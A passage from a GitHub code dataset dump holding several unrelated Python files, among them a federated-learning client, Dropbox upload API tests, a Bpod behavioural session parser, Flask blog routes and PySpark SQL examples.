str(stage))\n","repo_name":"FrankieLee1997/multi-lstm","sub_path":"multiLSTMtest.py","file_name":"multiLSTMtest.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29888166254","text":"from zope import schema, interface\nfrom getpaid.core import interfaces\n\nclass IAuthorizeNetOrder( interface.Interface ):\n \"\"\" in future use annotation for processor specific options \"\"\"\n\n\nclass IAuthorizeNetOptions(interfaces.IPaymentProcessorOptions):\n \"\"\"\n Authorize.Net options\n \"\"\"\n server_url = schema.Choice(\n title=u\"Authorize.net Server URL\", \n values=(\"Test\",\n \"Production\")\n )\n merchant_id = schema.ASCIILine( title=u\"API Login Id\" )\n merchant_key = schema.ASCIILine( title=u\"Transaction Key\" )\n \n send_test_requests = schema.Bool(\n title = u'Enable test requests',\n description = u'If checked, the x_test_request flag will be turned on if '\n u'the credit card is one of the following known test cards: '\n u'Visa 4007000000027, Visa 4012888818888, AmEx 370000000000002, '\n u'Discover 6011000000000012. Note: This does not work with '\n u'Automated Recurring Billing (ARB) subscriptions.'\n )\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20749337905","text":"import os\nfrom flask import render_template, request, Blueprint, url_for, current_app\nfrom flaskblog.models import Post\n\nmain = Blueprint('main', __name__)\n\n\n@main.route('/')\n@main.route('/home')\ndef home_func():\n page = request.args.get('page', 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)\n for post in posts.items:\n image_file = url_for('static', filename='profile_pics/' + post.author.image_file)\n abs_path = os.path.join(current_app.root_path, 'static', 'profile_pics', post.author.image_file)\n if not os.path.exists(abs_path):\n image_file = url_for('static', filename='profile_pics/default.jpg')\n post.author_file = image_file\n return render_template('home.html', posts=posts)\n\n\n@main.route('/about')\ndef about_func():\n return render_template('about.html', title='About')\n","repo_name":"rrkas-materials/PythonFlaskBlog","sub_path":"flaskblog/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74959203369","text":"import flwr as fl\r\nimport tensorflow\r\nimport random\r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport time\r\nimport sys\r\n\r\nfrom dataset_utils import ManageDatasets\r\nfrom model_definition import ModelCreation\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\")\r\n\r\nimport logging\r\nlogging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\r\n\r\nclass FedClient(fl.client.NumPyClient):\r\n\r\n\tdef __init__(self, cid=0, n_clients=None, epochs=1, \r\n\t\t\t\t model_name = 'None', \r\n\t\t\t\t client_selection = False, \r\n\t\t\t\t solution_name = 'None', \r\n\t\t\t\t aggregation_method = 'None',\r\n\t\t\t\t dataset = '',\r\n\t\t\t\t perc_of_clients = 0,\r\n\t\t\t\t decay = 0,\r\n\t\t\t\t transmittion_threshold = 0.2):\r\n\r\n\t\tself.cid = int(cid)\r\n\t\tself.n_clients = n_clients\r\n\t\tself.model_name = model_name\r\n\t\tself.local_epochs = epochs\r\n\t\tself.non_iid = False\r\n\r\n\t\tself.model = None\r\n\t\tself.x_train = None\r\n\t\tself.x_test = None\r\n\t\tself.y_train = None\r\n\t\tself.y_test = None\r\n\r\n\t\t#resources\r\n\t\tself.battery = random.randint(10, 100)\r\n\t\tself.cpu_cost = 0 \r\n\t\tself.transmittion_prob = 1\r\n\t\tself.transmittion_threshold = transmittion_threshold\r\n\r\n\t\t#logs\r\n\t\tself.solution_name = solution_name\r\n\t\tself.aggregation_method = aggregation_method\r\n\t\tself.dataset = dataset\r\n\r\n\t\tself.client_selection = client_selection\r\n\t\tself.perc_of_clients = perc_of_clients\r\n\t\tself.decay = decay\r\n\r\n\t\t#params\r\n\t\tif self.aggregation_method == 'POC':\r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}-{self.perc_of_clients}\"\r\n\r\n\t\telif self.aggregation_method == 'DEEV': \r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}-{self.decay}\"\r\n\r\n\t\telif self.aggregation_method == 'None':\r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}\"\r\n\r\n\t\tself.x_train, self.y_train, self.x_test, self.y_test = self.load_data(self.dataset, n_clients=self.n_clients)\r\n\t\tself.model = self.create_model()\r\n\r\n\tdef load_data(self, dataset_name, n_clients):\r\n\t\treturn ManageDatasets(self.cid).select_dataset(dataset_name, n_clients, self.non_iid)\r\n\r\n\tdef create_model(self):\r\n\t\tinput_shape = self.x_train.shape\r\n\r\n\t\tif self.model_name == 'LR':\r\n\t\t\treturn ModelCreation().create_LogisticRegression(input_shape, 6)\r\n\r\n\t\telif self.model_name == 'DNN':\r\n\t\t\treturn ModelCreation().create_DNN(input_shape, 6)\r\n\r\n\t\telif self.model_name == 'CNN':\r\n\t\t\treturn ModelCreation().create_CNN(input_shape, 6)\r\n\t\t\r\n\r\n\tdef get_parameters(self, config):\r\n\t\treturn self.model.get_weights()\r\n\r\n\r\n\r\n\tdef fit(self, parameters, config):\r\n\t\tselected_clients = []\r\n\t\ttrained_parameters = []\r\n\t\tselected = 0\r\n\t\thas_battery = False\r\n\t\ttotal_time = -1\r\n\r\n\t\tif config['selected_clients'] != '':\r\n\t\t\tselected_clients = [int (cid_selected) for cid_selected in config['selected_clients'].split(' ')]\r\n\t\t\r\n\t\tstart_time = time.process_time()\r\n\t\tif self.cid in selected_clients or self.client_selection == False or int(config['round']) == 1:\r\n\t\t\t\r\n\t\t\t#check if client has some battery available for training\r\n\t\t\tif self.battery >= 0.05:\r\n\t\t\t\tself.model.set_weights(parameters)\r\n\t\t\t\thas_battery = True\r\n\t\t\t\tselected = 1\r\n\t\t\t\thistory = self.model.fit(self.x_train, self.y_train, verbose=1, epochs=self.local_epochs)\r\n\t\t\t\ttrained_parameters = self.model.get_weights()\r\n\t\t\r\n\t\t\t\ttotal_time = time.process_time() - start_time\r\n\t\t\t\tsize_of_parameters = sum(map(sys.getsizeof, trained_parameters))\r\n\t\t\t\tavg_loss_train = np.mean(history.history['loss'])\r\n\t\t\t\tavg_acc_train = np.mean(history.history['accuracy'])\r\n\r\n\t\t\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/train_client.csv\"\r\n\t\t\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\t\t\tself.battery = self.battery - (total_time * 0.05)\r\n\t\t\t\tself.cpu_cost = total_time\r\n\r\n\t\t\t#fit_response = {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob,'cpu_cost': total_time}\r\n\r\n\t\t\t#check transmission probability\r\n\t\t\tlast_prob = self.transmittion_prob\r\n\t\t\tself.transmittion_prob = random.uniform(0, 1)\r\n\r\n\t\t\tif last_prob >= self.transmittion_threshold and has_battery:\r\n\t\t\t\twith open(filename, 'a') as log_train_file:\r\n\t\t\t\t\tlog_train_file.write(f\"{config['round']}, {self.cid}, {selected}, {total_time}, {size_of_parameters}, {avg_loss_train}, {avg_acc_train}\\n\")\r\n\t\t\t\t\t\r\n\t\t\t\treturn trained_parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\r\n\r\n\t\t\t#transmission or train failled\r\n\t\t\telse:\r\n\t\t\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/failures.csv\"\r\n\t\t\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\t\t\twith open(filename, 'a') as log_failure_file:\r\n\t\t\t\t\tlog_failure_file.write(f\"{config['round']}, {self.cid}, {last_prob}, {self.battery}\\n\")\r\n\r\n\t\t\t\treturn parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\r\n\t\telse:\r\n\t\t\treturn parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\t\t\t\t\r\n\r\n\r\n\r\n\tdef evaluate(self, parameters, config):\r\n\t\t\r\n\t\tself.model.set_weights(parameters)\r\n\t\tloss, accuracy = self.model.evaluate(self.x_test, self.y_test, verbose=0)\r\n\t\tsize_of_parameters = sum(map(sys.getsizeof, parameters))\r\n\r\n\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/evaluate_client.csv\"\r\n\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\twith open(filename, 'a') as log_evaluate_file:\r\n\t\t\tlog_evaluate_file.write(f\"{config['round']}, {self.cid}, {size_of_parameters}, {loss}, {accuracy}\\n\")\r\n\r\n\t\tevaluation_response = {\r\n\t\t\t\"cid\" : self.cid,\r\n\t\t\t\"accuracy\" : float(accuracy),\r\n\t\t\t\"transmittion_prob\" : self.transmittion_prob,\r\n\t\t\t\"cpu_cost\" : self.cpu_cost,\r\n\t\t\t\"battery\" : self.battery\r\n\t\t}\r\n\r\n\t\treturn loss, len(self.x_test), evaluation_response\r\n\r\n\r\ndef main():\r\n\t\r\n\tclient = FedClient(\r\n\t\t\t\t\tcid = int(os.environ['CLIENT_ID']), \r\n\t\t\t\t\tn_clients = None, \r\n\t\t\t\t\tmodel_name = os.environ['MODEL'], \r\n\t\t\t\t\tclient_selection = not os.environ['CLIENT_SELECTION'] == 'False', \r\n\t\t\t\t\tepochs = int(os.environ['LOCAL_EPOCHS']), \r\n\t\t\t\t\tsolution_name = os.environ['SOLUTION_NAME'],\r\n\t\t\t\t\taggregation_method = os.environ['ALGORITHM'],\r\n\t\t\t\t\tdataset = os.environ['DATASET'],\r\n\t\t\t\t\tperc_of_clients = float(os.environ['POC']),\r\n\t\t\t\t\tdecay = float(os.environ['DECAY']),\r\n\t\t\t\t\ttransmittion_threshold = float(os.environ['TRANSMISSION_THRESHOLD'])\r\n\t\t\t\t\t)\r\n\r\n\tfl.client.start_numpy_client(server_address=os.environ['SERVER_IP'], client=client)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"AllanMSouza/DEEV","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28857500867","text":"from ctre import WPI_TalonSRX\nfrom ctre import WPI_VictorSPX\nfrom wpilib.command import Subsystem\nfrom Subsystems.pid import PID\nfrom wpilib import Encoder\nfrom wpilib import DigitalInput\nimport wpilib\nimport ctre\n\nclass Arm(Subsystem):\n def __init__(self, robot):\n super().__init__(\"Arm\")\n self.robot = robot\n\n self.peakCurrentLimit = 30\n self.PeaKDuration = 50\n self.continuousLimit = 15\n\n motor = {}\n\n for name in self.robot.RobotMap.motorMap.motors:\n motor[name] = self.robot.Creator.createMotor(self.robot.RobotMap.motorMap.motors[name])\n\n self.motors = motor\n\n for name in self.motors:\n self.motors[name].setInverted(self.robot.RobotMap.motorMap.motors[name]['inverted'])\n # drive current limit\n self.motors[name].configPeakCurrentLimit(self.peakCurrentLimit, 10)\n self.motors[name].configPeakCurrentDuration(self.PeaKDuration, 10)\n self.motors[name].configContinuousCurrentLimit(self.continuousLimit, 10)\n self.motors[name].enableCurrentLimit(True)\n\n self.AEnc = Encoder(4, 5, False, Encoder.EncodingType.k4X)\n self.Zero = DigitalInput(6)\n\n self.kp = 0.00035\n self.ki = 0.00000000001\n self.kd = 0.0000001\n\n self.ArmPID = PID(self.kp, self.ki, self.kd)\n\n def log(self):\n wpilib.SmartDashboard.putNumber('armEnc', self.getHeight())\n wpilib.SmartDashboard.putNumber('Zero', self.getZeroPos())\n\n \"\"\"\n Get Functions\n \"\"\"\n\n def getHeight(self):\n # get encoder values\n return self.AEnc.get()\n\n def getZeroPos(self):\n # get zero position of arm\n return self.Zero.get()\n\n \"\"\"\n set functions\n \"\"\"\n def set(self, power):\n self.motors['RTArm'].set(ctre.ControlMode.PercentOutput, power)\n self.motors['LTArm'].set(ctre.ControlMode.PercentOutput, power)\n\n def stop(self):\n self.set(0)\n\n def resetHeight(self):\n self.AEnc.reset()\n","repo_name":"BTanjerine/FRC2019DeepSpaceCode","sub_path":"Subsystems/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71914398888","text":"\"\"\"\nThis is a Dropbox API. All information can be found at the below web address:\nhttps://www.dropbox.com/developers/documentation/http/documentation.\n\"\"\"\nimport json\nimport time\nimport os\nfrom helper_library_DB import Dropbox\nfrom helper_library_DB import Fake\n\n\nd = Dropbox()\nf = Fake()\n\n# Objective - Test if the api can upload a file to DB.\n# Expected Outcome - Assert http status code == 200 and use the search\n# api to see that the file exists.\ndef test_upload_validation():\n\n #Creating a fake directory name and file (First 5 lines)\n filename = f.create_file_name()\n f.create_file(filename)\n base_dir = \"{\\\"path\\\":\\\"/\"\n end_dir = filename+\"\\\"}\"\n db_path = os.path.join(base_dir, end_dir)\n\n my_headers = {\n \"Authorization\": d.authorization,\n \"Content-Type\": \"application/octet-stream\",\n \"Dropbox-API-Arg\": db_path\n }\n my_data = open(filename, \"rb\").read()\n r1 = d.db_upload(my_headers=my_headers,my_data=my_data)\n\n #Have to set a delay, otherwise the assert will check before the file has\n # been uploaded into the DB database.\n time.sleep(10)\n\n my_data2 = {\"path\": \"\", \"query\": filename}\n r2 = d.db_search(my_data2=my_data2)\n check_assert = json.loads(r2.text)['matches'][0]['metadata']['name']\n assert r1.status_code == 200 and check_assert == filename\n\n\"\"\"\n# Objective - Input an acceptable upload path to upload a file to DB.\n# Expected Outcome - Assert that the file was uploaded using the search\n# api.\ndef test_upload_path():\n assert True == False\n\n# Objective - Input an unacceptable upload path on DB (use incorrect\n# formats, ie. use '\\' instead of '/')\n# Expected Outcome - Assert that http error code != 200 and response\n# is returned with \"path does not match...\"\ndef test_upload_path_invalid():\n assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:add when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the file name that has been overwritten with \"(2).ext\"\ndef test_upload_mode_add():\n assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:upload when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# confirm there is not a duplicate filename.\ndef test_upload_mode_override():\n assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:update when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find same file name with appended \"conflicted copy\" string.\ndef test_upload_mode_update():\n assert True == False\n\n# Objective - Test to see what makes the upload mode invalid. Ex: Leave\n# the field blank when uploading.\n# Expected Outcome - Assert using the search api and find the uploaded\n# file with appended \"(2).ext\" after the file name.\ndef test_upload_mode_invalid():\n assert True == False\n\n# Objective - Test to see if DB will autorename the file if there is a\n# conflict with the mode.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the same file (DB will not autorename the file).\ndef test_upload_autorename_false()\n assert True == False\n\n# Objective - Test to see if DB will autorename the file if there is a\n# conflict with the mode.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the amended file name (DB will autorename the file).\ndef test_upload_authorname_true():\n assert True == False\n\n# Objective - See if inputting a timestamp when a user uploads the file\n# will appear on the \"client modified\" response.\n# Expected Outcome - Assert http code == 200 and use the search api and\n# assert the \"client modified\" field of the metadata is the same as\n# what was inputted\ndef test_upload_client_modified_future():\n assert True == False\n\n@pytest.mark.mute\n# Objective - Upload the file with mute: True.\n# Expected Outcome - User should not receive a notification on this\n# modification.\ndef test_upload_mute_true():\n assert True == False\n\n@pytest.mark.mute\n# Objective - Upload the file with mute: False.\n# Expected Outcome - User should receive a notification on any\n# modification to the file.\ndef test_upload_mute_false():\n assert True == False\n\n# Objective - Test to see if original uploaded file size is the same as\n# the size response.\n# Expected Outcome - Assert using the search api and confirm that the\n# size field == what was uploaded.\ndef test_upload_response_size():\n assert True == False\n\n# Objective - Upload a file and make sure the file path is correct.\n# Expected Outcome - Assert http response == 200 and use the search\n# api and check to see if \"path_lower\" field starts with a '/'\ndef test_upload_response_pathlower():\n assert True == False\n\n# Objective - Create an error that returns a malformed response.\n# Expected Outcome - Assert http code != 200 and will receive a\n# malformed response error message stating that the file could not be\n# saved.\ndef test_upload_error_malformed_path():\n assert True == False\n\n# Objective - Create a situation that does not give the user permission\n# to write to the target location.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_no_write_permission():\n assert True == False\n\n# Objective - Create a situation where the user goes over the available\n# space (bytes) when uploading a file.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_insufficient_space():\n assert True == False\n\n# Objective - Upload a file or folder with an inappropriate name or name\n# format.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_disallowed_name():\n assert True == False\n\n\"\"\"","repo_name":"superwdy/DB","sub_path":"api_tests/test_files_upload.py","file_name":"test_files_upload.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44866172378","text":"import os\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io as sio\n\nclass parseSess:\n\n def __init__(self,filepath):\n\n if not os.path.exists(filepath):\n print('File not found: ' + filepath)\n raise OSError(filepath)\n mysess = sio.loadmat(filepath, squeeze_me=True)\n self.fname = os.path.split(filepath)[1]\n self.bpod = mysess['SessionData']\n try:\n self.params = pd.Series({n: np.asscalar(self.bpod['Settings'].item()['GUI'].item()[n]) for n in self.bpod['Settings'].item()['GUI'].item().dtype.names})\n except Exception as e:\n print(e)\n self.params = pd.Series()\n warnings.warn('Could not load settings.')\n self.parse()\n\n def parse(self):\n\n # self.parsedData = pd.DataFrame({n:self.bpod['Custom'].item()[n].item() for n in ['BaitedL', 'BrokeFix', 'CenterPokeDur', 'ChoiceLeft','EarlySout', 'Grace', 'RewardMagnitude', 'Rewarded','SidePokeDur', 'StimGuided']}).iloc[:-1,:]\n\n nTrials = np.asscalar(self.bpod['nTrials'])\n tsState0 = self.bpod['TrialStartTimestamp'].item()\n\n ChoiceLeft = np.full(nTrials,False)\n ChoiceRight = np.full(nTrials,False)\n ChoiceMiss = np.full(nTrials,False)\n Rewarded = np.full(nTrials,False)\n BrokeFix = np.full(nTrials,False)\n EarlySout = np.full(nTrials,False)\n CheckedOther = np.full(nTrials,False)\n BaitedL = np.full(nTrials,False)\n StimGuided = np.full(nTrials,False)\n Grace = np.full(nTrials,False)\n\n CenterPokeDur = np.full(nTrials,np.nan)\n SidePokeDur = np.full(nTrials,np.nan)\n\n tsChoice = np.full(nTrials,np.nan)\n tsPokeL = [[]]*nTrials\n tsPokeC = [[]]*nTrials\n tsPokeR = [[]]*nTrials\n assert(not np.isscalar(tsState0)), \"Session is only 1 trial long. Aborting.\"\n assert(len(tsState0) > 20), \"Session is only {} trials long. Aborting.\".format(len(tsState0))\n tsState0 = tsState0 - tsState0[0]\n\n PortL = 'Port' + str(int(self.params.Ports_LMR))[0] + 'In'\n PortC = 'Port' + str(int(self.params.Ports_LMR))[1] + 'In'\n PortR = 'Port' + str(int(self.params.Ports_LMR))[2] + 'In'\n stateTraj = [[]]*nTrials\n\n for iTrial in range(nTrials):\n listStates = self.bpod['RawData'].item()['OriginalStateNamesByNumber'].item()[iTrial]\n stateTraj[iTrial] = listStates[self.bpod['RawData'].item()['OriginalStateData'].item()[iTrial]-1] #from 1- to 0-based indexing\n\n if any([PortL in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeL[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortL].item()\n\n if any([PortC in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeC[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortC].item()\n\n if any([PortR in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeR[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortR].item()\n\n ChoiceMiss[iTrial] = any(['choice_miss' in stateTraj[iTrial]])\n Rewarded[iTrial] = any([n.startswith('water_') for n in stateTraj[iTrial]])\n BrokeFix[iTrial] = any(['BrokeFix' in stateTraj[iTrial]])\n EarlySout[iTrial] = any(['EarlySout' in stateTraj[iTrial]])\n StimGuided[iTrial] = any(['Cin_late' in stateTraj[iTrial]])\n Grace[iTrial] = any(['grace' in n for n in stateTraj[iTrial]])\n\n ndx_start_S = np.array([n.startswith('start_') for n in stateTraj[iTrial]])\n if ndx_start_S.any():\n start_S = stateTraj[iTrial][ndx_start_S].item()\n tsChoice[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n\n ChoiceLeft[iTrial] = start_S.startswith('start_L')\n if ChoiceLeft[iTrial]:\n CheckedOther[iTrial] = (tsPokeR[iTrial] > tsChoice[iTrial]).any()\n\n ChoiceRight[iTrial] = start_S.startswith('start_R')\n if ChoiceRight[iTrial]:\n CheckedOther[iTrial] = (tsPokeL[iTrial] > tsChoice[iTrial]).any()\n\n if EarlySout[iTrial]:\n grace_state = np.unique(stateTraj[iTrial][['grace' in n for n in stateTraj[iTrial]]]).item()\n SidePokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[grace_state].item().ravel()[-2] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n else:\n SidePokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['ITI'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n ChoicePortOut = PortL if ChoiceLeft[iTrial] else PortR\n ChoicePortOut = ChoicePortOut[:-2] + 'Out'\n if ChoicePortOut in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names:\n candidates = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[ChoicePortOut].item()\n candidates = candidates if np.isscalar(candidates) else candidates.astype(float)\n thresh = tsChoice[iTrial]\n if Grace[iTrial]:\n grace_state = np.unique(stateTraj[iTrial][['grace' in n for n in stateTraj[iTrial]]]).item()\n thresh = max(thresh,self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[grace_state].item().max())\n if (candidates > thresh).any():\n if not np.isscalar(candidates):\n candidates = min(candidates[candidates > thresh])\n SidePokeDur[iTrial] = candidates - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n\n if StimGuided[iTrial]:\n CenterPokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_late'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[0]\n else:\n CenterPokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[0]\n\n BaitedL = self.bpod['Custom'].item()['BaitedL'].item().astype(bool)\n isChoiceBaited = np.logical_or(np.logical_and(ChoiceLeft,BaitedL),\n np.logical_and(ChoiceRight,~BaitedL),\n )\n\n assert(isChoiceBaited[Rewarded].all()), \"Impossible trials found: unbaited AND rewarded.\"\n\n self.parsedData = pd.DataFrame({'iTrial': np.arange(nTrials),\n 'isChoiceLeft': ChoiceLeft, 'isChoiceRight': ChoiceRight, 'isBaitedLeft':BaitedL,'isStimGuided':StimGuided,'isGraceVisited':Grace,\n 'isChoiceMiss': ChoiceMiss,'isRewarded': Rewarded,'isBrokeFix': BrokeFix, 'isEarlySout': EarlySout, 'isChoiceBaited':isChoiceBaited,'isCheckedOther':CheckedOther,\n 'stateTraj': stateTraj,'tsState0': tsState0, 'tsChoice': tsChoice, 'tsPokeL': tsPokeL, 'tsPokeC': tsPokeC, 'tsPokeR': tsPokeR,'CenterPokeDur':CenterPokeDur,'SidePokeDur':SidePokeDur})\n\n self.parsedData = self.parsedData.set_index('iTrial')\n","repo_name":"tsgouvea/tasksuite_analysis","sub_path":"tasks/blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":7864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21879985145","text":"class Customer:\n price = None\n\n def __init__(self):\n self.discount = 0\n self.price = 0\n self.totalprice = 0\n\n def get_price(self):\n return self.price\n\n def set_price(self, price):\n if price >= 10000:\n self.discount = price * 0.10\n self.totalprice = price - self.discount\n else:\n self.totalprice = price\n self.price = price\n\n def __str__(self):\n receipt = \"\"\"\nHeild: {OriginalPrice} \nAfsláttur: {Discount}\n-----------------------------------\nTil greiðslu: {TotalPrice} \n\n\n \"\"\"\n output = receipt.format(OriginalPrice=self.price, Discount=self.discount, TotalPrice=self.totalprice)\n return output\n\ndef main():\n print(\"-------Your store--------\")\n price = 0\n\n n = 0\n while n != \"q\":\n price += int(n)\n n = input(\"Enter a price like (5995) and press(q to calculate): \")\n\n customer = Customer()\n customer.set_price(price)\n print(customer)\n\n\nmain()\n\n\n\n\n\n","repo_name":"adambjorgvins/pricelist","sub_path":"pricelist.py","file_name":"pricelist.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6781644652","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 27 00:58:27 2017\n\n@author: wangke\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom pyspark.sql import SparkSession\n\nfrom pyspark.sql import Row\n\nfrom pyspark.sql.types import *\n\n\ndef myjson(spark):\n \n df = spark.read.json(\"/Users/wangke/Desktop/output5.json\")\n df.show()\n df.printSchema()\n df.select(\"word\").show()\n df.select(df['word'], df['count'] + 1).show()\n df.filter(df['count'] > 5000).show()\n df.groupBy(\"count\").count().show()\n df.createOrReplaceTempView(\"wordcount\")\n sqlDF = spark.sql(\"SELECT * FROM wordcount\")\n sqlDF.show()\n df.createGlobalTempView(\"wordcount\")\n spark.sql(\"SELECT * FROM global_temp.wordcount\").show()\n spark.newSession().sql(\"SELECT * FROM global_temp.wordcount\").show()\n\n\ndef mysql(spark):\n sc = spark.sparkContext\n lines = sc.textFile(\"/Users/wangke/Desktop/output.txt\")\n parts = lines.map(lambda l: l.split(\",\"))\n wordcount = parts.map(lambda p: Row(word=p[0], count=int(p[1])))\n schemaWord = spark.createDataFrame(wordcount)\n schemaWord.createOrReplaceTempView(\"wordcount\")\n highfreq = spark.sql(\"SELECT word FROM wordcount WHERE count>=5000\")\n highfreq.show()\n\n highfreqword = highfreq.rdd.map(lambda p: \"word: \" + p.word).collect()\n for word in highfreqword:\n print(word)\n\n\nif __name__ == \"__main__\":\n spark = SparkSession \\\n .builder \\\n .appName(\"PySpark SQL\") \\\n .config(\"spark.some.config.option\", \"some-value\") \\\n .getOrCreate()\n\n myjson(spark)\n mysql(spark)\n\n spark.stop()","repo_name":"WangKe2333/spark","sub_path":"spark_project1/pyspark_sql.py","file_name":"pyspark_sql.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41463610208","text":"# #时间模组\n# ctime():以传入的时间数值来取得时间字串;\n# sleep()语法:程式暂停停止执行n秒\n# localtime()语法:取得时间日期和时间资讯。\n# time():取得目前时间的数值;\n# import time as t\n# print(t.sleep(1))# 暂停1秒钟\n\n# t1 = t.time()# 取得时间数值\n# print(t1)# 时间数值是1692194764.1293414\n\n# t2 = t.sleep(1)# 让程式暂停1秒钟\n# print(t2)# 暂停1秒钟了\n\n# print(t.localtime(t.time()))# 取得时间数值\n\n# 可以用物件或索引值来表示\n# def time1():\n# t3 = t.localtime(t.time())# 取得时间的资讯(抓取时间数值)\n# year = t3.tm_year# 利用物件来获得年\n# mon = t3[1]# 利用索引值来获得月\n# mday = t3.tm_mday# 利用物件来获得日\n# print(year,mon,mday)#2023,8\n# time1()#用函式执行\n\n# 示范操作\nimport time as t # 载入时间单位\n\nweek = [\" 一\", \" 二\", \" 三\", \" 四\", \" 五\", \" 六\", \" 日\"]\nt4 = t.localtime()\nprint(\"今天是星期\" + week[t4.tm_wday])\n\n\n\n","repo_name":"tonyfiry/python_getting_started","sub_path":"python/python_file/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39292543558","text":"from toy_datasets import *\nimport torch\nimport matplotlib.pyplot as plt\nfrom toy_constants import *\nimport numpy as np\nfrom toy_property import compute_samples_property\nfrom boosting.weighted_loss import WeightedLoss\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\ndef get_data_loader(X, y, sampler=None, shuffle=True, num_workers=0):\n \"\"\"\n Generate a DataLoader object given a two numpy arrays.\n :param X: numpy array of samples\n :param y: numpy array of labels\n :param shuffle: if True, shuffle samples\n :param num_workers:\n :return: a DataLoader object initialized with X and y\n 